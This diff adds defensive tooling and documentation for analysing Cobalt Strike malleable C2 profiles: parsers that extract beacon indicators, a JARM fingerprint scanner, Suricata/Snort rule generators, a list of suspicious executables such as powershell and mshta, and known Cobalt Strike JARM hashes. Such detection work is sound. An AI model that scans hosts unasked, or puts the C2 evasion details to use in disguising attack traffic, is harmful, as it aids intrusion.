 p.set_option("jitter", "0")
 p.set_option("pipename", "mojo__##")
 # HTTP blocks
 http_get = HttpGetBlock()
 http_get.set_option("uri", "/updates")
 client = ClientBlock()
 client.add_statement("header", "Accept", "*/*")
 http_get.add_code_block(client)
 p.add_code_block(http_get)
 # AST and reconstruction
 print(p.ast.pretty())   # Display AST
 print(p)                # Reconstruct source
 ```
 ## JARM TLS Fingerprinting
 ```bash
 # Scan a single host
 python3 jarm.py www.example.com
 # Scan with specific port
 python3 jarm.py 192.168.1.1 -p 8443
 # Batch scan from file
 python3 jarm.py -i targets.txt -o results.csv
 ```
 Fingerprint format: 62-char hybrid hash
 - First 30 chars: cipher + TLS version (10 handshakes x 3 chars)
 - Last 32 chars: truncated SHA256 of cumulative extensions
 ## Known Cobalt Strike JARM Hashes
 | JARM Hash | Description |
 |-----------|-------------|
 | `07d14d16d21d21d07c42d41d00041d...` | CS default config |
 | `07d14d16d21d21d00042d41d00041d...` | CS with Java 11 |
 ## dissect.cobaltstrike (Alternative)
 ```python
 from dissect.cobaltstrike import beacon
 b = beacon.BeaconConfig.from_file("beacon.bin")
 print(b.protocol, b.port, b.sleeptime)
 ```
 ### References
 - pyMalleableC2: https://github.com/byt3bl33d3r/pyMalleableC2
 - JARM scanner: https://github.com/salesforce/jarm
 - dissect.cobaltstrike: https://github.com/fox-it/dissect.cobaltstrike
 - C2 JARM list: https://github.com/cedowens/C2-JARM
@@ -1,174 +0,0 @@
 #!/usr/bin/env python3
 """Agent for analyzing Cobalt Strike malleable C2 profiles and JARM fingerprinting."""
 import os
 import json
 import subprocess
 import argparse
 from pathlib import Path
 from datetime import datetime
 from malleablec2 import Profile
 def extract_profile_indicators(profile_path):
    """Extract detection indicators from a malleable C2 profile."""
    with open(profile_path) as f:
        content = f.read()
    profile = Profile.from_string(content)
    indicators = {
        "file": str(profile_path),
        "source_lines": len(content.splitlines()),
        "reconstructed": str(profile),
    }
    keywords = ["sleeptime", "jitter", "useragent", "pipename", "host_stage",
                "dns_idle", "dns_sleep", "spawnto_x86", "spawnto_x64"]
    options = {}
    for kw in keywords:
        for line in content.splitlines():
            stripped = line.strip().rstrip(";").strip()
            if kw in stripped.lower() and "set " in stripped.lower():
                parts = stripped.split('"')
                if len(parts) >= 2:
                    options[kw] = parts[1]
    indicators["global_options"] = options
    uris = []
    for line in content.splitlines():
        if "set uri" in line.strip().lower():
            parts = line.strip().split('"')
            if len(parts) >= 2:
                uris.append(parts[1])
    indicators["uris"] = uris
    headers = []
    for line in content.splitlines():
        stripped = line.strip()
        if "header " in stripped.lower() and '"' in stripped:
            parts = stripped.split('"')
            if len(parts) >= 4:
                headers.append({"name": parts[1], "value": parts[3]})
    indicators["custom_headers"] = headers
    return indicators
 def scan_directory_profiles(directory):
    """Scan a directory for malleable C2 profiles and extract indicators."""
    results = []
    for path in Path(directory).rglob("*.profile"):
        try:
            indicators = extract_profile_indicators(str(path))
            results.append(indicators)
        except Exception as e:
            results.append({"file": str(path), "error": str(e)})
    return results
 KNOWN_CS_JARM = {
    "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1":
        "Cobalt Strike (default)",
    "07d14d16d21d21d00042d41d00041de5fb3038104f457d92ba02e9311512c2":
        "Cobalt Strike (Java 11)",
 }
 def compute_jarm_fingerprint(host, port=443):
    """Compute JARM fingerprint by invoking the salesforce/jarm scanner."""
    jarm_script = os.getenv("JARM_SCRIPT", "jarm.py")
    try:
        result = subprocess.run(
            ["python3", jarm_script, host, "-p", str(port)],
            capture_output=True, text=True, timeout=30,
        )
        for line in result.stdout.splitlines():
            if len(line.strip()) >= 62:
                return line.strip().split()[-1]
        return result.stdout.strip()
    except Exception as e:
        return f"Error: {e}"
 def check_jarm_against_known(fingerprint):
    """Check a JARM fingerprint against known Cobalt Strike signatures."""
    for jarm_hash, description in KNOWN_CS_JARM.items():
        if fingerprint.strip() == jarm_hash:
            return {"match": True, "description": description, "fingerprint": fingerprint}
    return {"match": False, "fingerprint": fingerprint}
 def batch_jarm_scan(targets, port=443):
    """Scan multiple targets for JARM fingerprints and check against known CS hashes."""
    results = []
    for target in targets:
        fp = compute_jarm_fingerprint(target, port)
        match = check_jarm_against_known(fp)
        match["target"] = target
        results.append(match)
    return results
 def generate_snort_rules(indicators_list):
    """Generate Snort/Suricata rules from extracted profile indicators."""
    rules = []
    sid = 1000001
    for ind in indicators_list:
        for uri in ind.get("uris", []):
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any '
                f'(msg:"CS Beacon URI {uri}"; '
                f'content:"{uri}"; http_uri; sid:{sid}; rev:1;)'
            )
            sid += 1
        ua = ind.get("global_options", {}).get("useragent", "")
        if ua:
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any '
                f'(msg:"CS Beacon User-Agent"; '
                f'content:"{ua}"; http_header; sid:{sid}; rev:1;)'
            )
            sid += 1
    return rules
 def main():
    parser = argparse.ArgumentParser(description="Cobalt Strike Malleable Profile Analyzer")
    parser.add_argument("--profile", help="Path to a single malleable C2 profile")
    parser.add_argument("--directory", help="Directory of malleable profiles")
    parser.add_argument("--jarm-targets", nargs="*", help="Hosts to JARM fingerprint")
    parser.add_argument("--output", default="cs_analysis_report.json")
    parser.add_argument("--action", choices=[
        "parse", "scan_dir", "jarm", "generate_rules", "full_analysis"
    ], default="full_analysis")
    args = parser.parse_args()
    report = {"generated_at": datetime.utcnow().isoformat(), "findings": {}}
    if args.action in ("parse", "full_analysis") and args.profile:
        indicators = extract_profile_indicators(args.profile)
        report["findings"]["profile_indicators"] = indicators
        print(f"[+] Parsed: {args.profile} ({len(indicators.get('uris', []))} URIs)")
    if args.action in ("scan_dir", "full_analysis") and args.directory:
        results = scan_directory_profiles(args.directory)
        report["findings"]["directory_scan"] = results
        print(f"[+] Scanned {len(results)} profiles in {args.directory}")
    if args.action in ("jarm", "full_analysis") and args.jarm_targets:
        jarm_results = batch_jarm_scan(args.jarm_targets)
        report["findings"]["jarm_scan"] = jarm_results
        matches = [r for r in jarm_results if r.get("match")]
        print(f"[+] JARM: {len(jarm_results)} scanned, {len(matches)} CS matches")
    if args.action in ("generate_rules", "full_analysis"):
        profiles = report["findings"].get("directory_scan", [])
        if not profiles and args.profile:
            profiles = [report["findings"].get("profile_indicators", {})]
        rules = generate_snort_rules(profiles)
        report["findings"]["snort_rules"] = rules
        print(f"[+] Generated {len(rules)} Snort rules")
    with open(args.output, "w") as f:
        json.dump(report, f, indent=2, default=str)
    print(f"[+] Report saved to {args.output}")
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,68 @@
 ---
 name: analyzing-cobaltstrike-malleable-c2-profiles
 description: Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike
  and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate
  network detection signatures.
 domain: cybersecurity
 subdomain: malware-analysis
 tags:
 - cobalt-strike
 - malleable-c2
 - c2-detection
 - beacon-analysis
 - network-signatures
 - threat-hunting
 - red-team-tools
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1573.002
 - T1001.003
 - T1090.004
 - T1102
 ---
 # Analyzing CobaltStrike Malleable C2 Profiles
 ## Overview
 Cobalt Strike Malleable C2 profiles are domain-specific language scripts that customize how Beacon communicates with the team server, defining HTTP request/response transformations, sleep intervals, jitter values, user agents, URI paths, and process injection behavior. Threat actors use malleable profiles to disguise C2 traffic as legitimate services (Amazon, Google, Slack). Analyzing these profiles reveals network indicators for detection: URI patterns, HTTP headers, POST/GET transforms, DNS settings, and process injection techniques. The `dissect.cobaltstrike` library can parse both profile files and extract configurations from beacon payloads, while `pyMalleableC2` provides AST-based parsing using Lark grammar for programmatic profile manipulation and validation.
 ## When to Use
 - When investigating security incidents that require analyzing cobaltstrike malleable c2 profiles
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `dissect.cobaltstrike` and/or `pyMalleableC2`
 - Sample Malleable C2 profiles (available from public repositories)
 - Understanding of HTTP protocol and Cobalt Strike beacon communication model
 - Network monitoring tools (Suricata/Snort) for signature deployment
 - PCAP analysis tools for traffic validation
 ## Steps
 1. Install libraries: `pip install dissect.cobaltstrike` or `pip install pyMalleableC2`
 2. Parse profile with `C2Profile.from_path("profile.profile")`
 3. Extract HTTP GET/POST block configurations (URIs, headers, parameters)
 4. Identify user agent strings and spoof targets
 5. Extract sleep time, jitter percentage, and DNS beacon settings
 6. Analyze process injection settings (spawn-to, allocation technique)
 7. Generate Suricata/Snort signatures from extracted network indicators
 8. Compare profile against known threat actor profile collections
 9. Extract staging URIs and payload delivery mechanisms
 10. Produce detection report with IOCs and recommended network signatures
 ## Expected Output
 A JSON report containing extracted C2 URIs, HTTP headers, user agents, sleep/jitter settings, process injection config, spawned process paths, DNS settings, and generated Suricata-compatible detection rules.
@@ -0,0 +1,95 @@
 # CobaltStrike Malleable C2 Profile Analysis API Reference
 ## Installation
 ```bash
 pip install dissect.cobaltstrike
 pip install 'dissect.cobaltstrike[full]'   # With PCAP support
 pip install pyMalleableC2                   # Alternative parser
 ```
 ## dissect.cobaltstrike API
 ### Parse Beacon Configuration
 ```python
 from dissect.cobaltstrike.beacon import BeaconConfig
 bconfig = BeaconConfig.from_path("beacon.bin")
 print(hex(bconfig.watermark))     # 0x5109bf6d
 print(bconfig.protocol)           # https
 print(bconfig.version)            # BeaconVersion(...)
 print(bconfig.settings)           # Full config dict
 ```
 ### Parse Malleable C2 Profile
 ```python
 from dissect.cobaltstrike.c2profile import C2Profile
 profile = C2Profile.from_path("amazon.profile")
 config = profile.as_dict()
 print(config["useragent"])
 print(config["http-get.uri"])
 print(config["sleeptime"])
 ```
 ### PCAP Analysis
 ```bash
 # Extract beacons from PCAP
 beacon-pcap --extract-beacons traffic.pcap
 # Decrypt traffic with private key
 beacon-pcap -p team_server.pem traffic.pcap --beacon beacon.bin
 ```
 ## pyMalleableC2 API
 ```python
 from malleableC2 import Profile
 profile = Profile.from_file("amazon.profile")
 print(profile.sleeptime)
 print(profile.useragent)
 print(profile.http_get.uri)
 print(profile.http_post.uri)
 ```
 ## Key Profile Settings
 | Setting | Description | Detection Value |
 |---------|-------------|-----------------|
 | `sleeptime` | Callback interval (ms) | Low values = aggressive beaconing |
 | `jitter` | Sleep randomization % | Timing analysis evasion |
 | `useragent` | HTTP User-Agent string | Network signature |
 | `http-get.uri` | GET request URI path | URI-based detection |
 | `http-post.uri` | POST request URI path | URI-based detection |
 | `spawnto_x86` | 32-bit spawn process | Process creation detection |
 | `spawnto_x64` | 64-bit spawn process | Process creation detection |
 | `pipename` | Named pipe pattern | Named pipe monitoring |
 | `dns_idle` | DNS idle IP address | DNS beacon detection |
 | `watermark` | License watermark | Operator attribution |
 ## Suricata Rule Format
 ```
 alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"MALWARE CobaltStrike C2 URI";
  flow:established,to_server;
  http.uri; content:"/api/v1/status";
  http.header; content:"User-Agent: Mozilla/5.0";
  sid:9000001; rev:1;
 )
 ```
 ## CLI Usage
 ```bash
 python agent.py --input profile.profile --output report.json
 python agent.py --input parsed_config.json --output report.json
 ```
 ## References
 - dissect.cobaltstrike: https://github.com/fox-it/dissect.cobaltstrike
 - pyMalleableC2: https://github.com/byt3bl33d3r/pyMalleableC2
 - Unit42 Analysis: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
 - Config Extractor: https://github.com/strozfriedberg/cobaltstrike-config-extractor
@@ -0,0 +1,234 @@
 #!/usr/bin/env python3
 """CobaltStrike Malleable C2 Profile Analyzer - parses profiles to extract C2 indicators, detection signatures, and evasion techniques"""
 # For authorized security research and defensive analysis only
 import argparse
 import json
 import re
 from collections import Counter
 from datetime import datetime
 from pathlib import Path
 try:
    from dissect.cobaltstrike.c2profile import C2Profile
    HAS_DISSECT = True
 except ImportError:
    HAS_DISSECT = False
 RUN_KEY_SUSPICIOUS = ["powershell", "cmd.exe", "mshta", "rundll32", "regsvr32", "wscript", "cscript"]
 KNOWN_SPOOF_TARGETS = {
    "amazon": "Amazon CDN impersonation",
    "google": "Google services impersonation",
    "microsoft": "Microsoft services impersonation",
    "slack": "Slack API impersonation",
    "cloudfront": "CloudFront CDN impersonation",
    "jquery": "jQuery CDN impersonation",
    "outlook": "Outlook Web impersonation",
    "onedrive": "OneDrive impersonation",
 }
 def load_data(path):
    return json.loads(Path(path).read_text(encoding="utf-8"))
 def parse_profile_with_dissect(profile_path):
    """Parse a .profile file using dissect.cobaltstrike C2Profile."""
    if not HAS_DISSECT:
        return None
    profile = C2Profile.from_path(profile_path)
    return profile.as_dict()
 def parse_profile_regex(content):
    """Regex-based parser for malleable C2 profile when dissect is unavailable."""
    config = {}
    set_pattern = re.compile(r'set\s+(\w+)\s+"([^"]*)"', re.MULTILINE)
    for match in set_pattern.finditer(content):
        config[match.group(1)] = match.group(2)
    block_pattern = re.compile(r'(http-get|http-post|http-stager|https-certificate|dns-beacon|process-inject|post-ex)\s*\{', re.MULTILINE)
    for match in block_pattern.finditer(content):
        config.setdefault("blocks", []).append(match.group(1))
    uri_pattern = re.compile(r'set\s+uri\s+"([^"]*)"', re.MULTILINE)
    for match in uri_pattern.finditer(content):
        config.setdefault("uris", []).append(match.group(1))
    header_pattern = re.compile(r'header\s+"([^"]+)"\s+"([^"]*)"', re.MULTILINE)
    for match in header_pattern.finditer(content):
        config.setdefault("headers", []).append({"name": match.group(1), "value": match.group(2)})
    spawn_pattern = re.compile(r'set\s+spawnto_x(?:86|64)\s+"([^"]*)"', re.MULTILINE)
    for match in spawn_pattern.finditer(content):
        config.setdefault("spawn_to", []).append(match.group(1))
    return config
 def analyze_profile(config):
    """Analyze parsed profile configuration for detection opportunities."""
    findings = []
    ua = config.get("useragent", config.get("user_agent", ""))
    if ua:
        findings.append({
            "type": "user_agent_identified",
            "severity": "info",
            "resource": "http-config",
            "detail": f"User-Agent: {ua[:100]}",
            "indicator": ua,
        })
        for target, desc in KNOWN_SPOOF_TARGETS.items():
            if target.lower() in ua.lower():
                findings.append({
                    "type": "service_impersonation",
                    "severity": "medium",
                    "resource": "user-agent",
                    "detail": f"{desc} detected in User-Agent string",
                })
    sleeptime = config.get("sleeptime", config.get("sleep_time", ""))
    jitter = config.get("jitter", "")
    if sleeptime:
        try:
            sleep_ms = int(sleeptime)
            if sleep_ms < 1000:
                findings.append({
                    "type": "aggressive_beaconing",
                    "severity": "high",
                    "resource": "beacon-config",
                    "detail": f"Very low sleep time: {sleep_ms}ms - aggressive C2 callback rate",
                })
        except ValueError:
            pass
    uris = config.get("uris", [])
    for uri in uris:
        findings.append({
            "type": "c2_uri",
            "severity": "high",
            "resource": "http-config",
            "detail": f"C2 URI path: {uri}",
            "indicator": uri,
        })
    headers = config.get("headers", [])
    for h in headers:
        name = h.get("name", "") if isinstance(h, dict) else str(h)
        value = h.get("value", "") if isinstance(h, dict) else ""
        if name.lower() in ("host", "cookie", "authorization"):
            findings.append({
                "type": "c2_header",
                "severity": "medium",
                "resource": "http-config",
                "detail": f"Custom header: {name}: {value[:60]}",
            })
    spawn_to = config.get("spawn_to", config.get("spawnto_x86", []))
    if isinstance(spawn_to, str):
        spawn_to = [spawn_to]
    for proc in spawn_to:
        findings.append({
            "type": "spawn_to_process",
            "severity": "high",
            "resource": "process-inject",
            "detail": f"Beacon spawns to: {proc}",
            "indicator": proc,
        })
    pipename = config.get("pipename", config.get("pipename_stager", ""))
    if pipename:
        findings.append({
            "type": "named_pipe",
            "severity": "high",
            "resource": "process-inject",
            "detail": f"Named pipe: {pipename}",
            "indicator": pipename,
        })
    dns_idle = config.get("dns_idle", "")
    if dns_idle:
        findings.append({
            "type": "dns_beacon_config",
            "severity": "medium",
            "resource": "dns-beacon",
            "detail": f"DNS idle IP: {dns_idle}",
        })
    watermark = config.get("watermark", "")
    if watermark:
        findings.append({
            "type": "watermark",
            "severity": "info",
            "resource": "beacon-config",
            "detail": f"Beacon watermark: {watermark}",
        })
    return findings
 def generate_suricata_rules(findings, sid_start=9000001):
    """Generate Suricata rules from extracted indicators."""
    rules = []
    sid = sid_start
    for f in findings:
        if f["type"] == "c2_uri" and f.get("indicator"):
            uri = f["indicator"].replace('"', '\\"')
            rules.append(
                f'alert http $HOME_NET any -> $EXTERNAL_NET any '
                f'(msg:"MALWARE CobaltStrike Malleable C2 URI {uri}"; '
                f'flow:established,to_server; '
                f'http.uri; content:"{uri}"; '
                f'sid:{sid}; rev:1;)'
            )
            sid += 1
        elif f["type"] == "named_pipe" and f.get("indicator"):
            pipe = f["indicator"]
            rules.append(
                f'# Named pipe detection requires endpoint monitoring: {pipe}'
            )
    return rules
 def analyze(data):
    if isinstance(data, str):
        config = parse_profile_regex(data)
    elif isinstance(data, dict):
        config = data
    else:
        config = data[0] if isinstance(data, list) and data else {}
    return analyze_profile(config)
 def generate_report(input_path):
    path = Path(input_path)
    if path.suffix in (".profile", ".txt"):
        content = path.read_text(encoding="utf-8")
        config = parse_profile_regex(content)
        findings = analyze_profile(config)
    else:
        data = load_data(input_path)
        if isinstance(data, list):
            findings = []
            for profile in data:
                findings.extend(analyze_profile(profile))
        else:
            findings = analyze_profile(data)
    sev = Counter(f["severity"] for f in findings)
    iocs = [f.get("indicator", "") for f in findings if f.get("indicator")]
    rules = generate_suricata_rules(findings)
    return {
        "report": "cobaltstrike_malleable_c2_analysis",
        "generated_at": datetime.utcnow().isoformat() + "Z",
        "total_findings": len(findings),
        "severity_summary": dict(sev),
        "extracted_iocs": iocs,
        "suricata_rules": rules,
        "findings": findings,
    }
 def main():
    ap = argparse.ArgumentParser(description="CobaltStrike Malleable C2 Profile Analyzer")
    ap.add_argument("--input", required=True, help="Input .profile file or JSON with parsed config")
    ap.add_argument("--output", help="Output JSON report path")
    args = ap.parse_args()
    report = generate_report(args.input)
    out = json.dumps(report, indent=2)
    if args.output:
        Path(args.output).write_text(out, encoding="utf-8")
        print(f"Report written to {args.output}")
    else:
        print(out)
 if __name__ == "__main__":
    main()
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
